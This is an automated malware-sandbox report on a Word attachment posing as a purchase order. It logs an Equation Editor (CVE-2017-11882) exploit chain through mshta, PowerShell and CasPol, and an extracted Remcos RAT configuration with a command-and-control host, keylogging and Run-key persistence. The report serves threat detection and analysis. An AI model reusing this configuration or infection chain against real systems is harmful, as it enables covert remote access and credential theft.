                  2024-10-23T17:27:02.450167+0200 | 2049038 | 1 | A Network Trojan was detected | 216.58.212.129 | 443 | 192.168.2.22 | 49172 | TCP
                  2024-10-23T17:27:23.239085+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP

                  AV Detection

                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
                  Source: PO NAHK22012FA00000.docx.doc | ReversingLabs: Detection: 13%
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 20_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,22_2_00404423
                  Source: powershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_f6e0fa35-6

                  Exploits

                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 85.215.206.82 Port: 80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\mshta.exe
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr | Stream path '_1791187939/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 20_2_00407538 _wcslen,CoGetObject,20_2_00407538
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
